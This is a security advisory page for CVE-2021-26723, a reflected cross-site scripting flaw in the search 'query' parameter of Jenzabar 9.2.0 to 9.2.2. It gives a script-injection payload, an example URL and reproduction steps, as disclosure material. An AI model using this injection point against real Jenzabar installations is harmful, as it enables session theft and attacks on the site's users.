Lucene search

K
packetstormY0ung_dstPACKETSTORM:161303
HistoryFeb 06, 2021 - 12:00 a.m.

Jenzabar 9.2.2 Cross Site Scripting

2021-02-0600:00:00
y0ung_dst
packetstormsecurity.com
98

0.075 Low

EPSS

Percentile

94.1%

`# Exploit Title: Jenzabar 9.2.2 - 'query' Reflected XSS.  
# Date: 2021–02–06  
# Exploit Author: y0ung_dst  
# Vendor Homepage: https://jenzabar.com  
# Version: Jenzabar — v9.2.0-v9.2.1-v9.2.2 (and maybe other versions)  
# Tested on: Windows 10  
# CVE : CVE-2021–26723  
  
  
-Description:  
A Reflected Cross-site scripting (XSS) vulnerability in Jenzabar v9.2.0 through 9.2.2. Attacker could inject web script or HTML via the query parameter (aka the Search Field). To exploit the vulnerability, someone must click the link.  
  
-Payload used:  
"><script>alert(1)</script>  
  
-Example :  
https://localhost/ics?tool=search&query="><script>alert(1)</script>  
  
-Steps to reproduce:  
1. Open a website that use Jenzabar v9.2.0 through 9.2.2.  
2. In the Search Field, enter anything.  
3. Edit the query by replacing the text with the payload.  
4. Press Enter to trigger the alert.  
  
`

0.075 Low

EPSS

Percentile

94.1%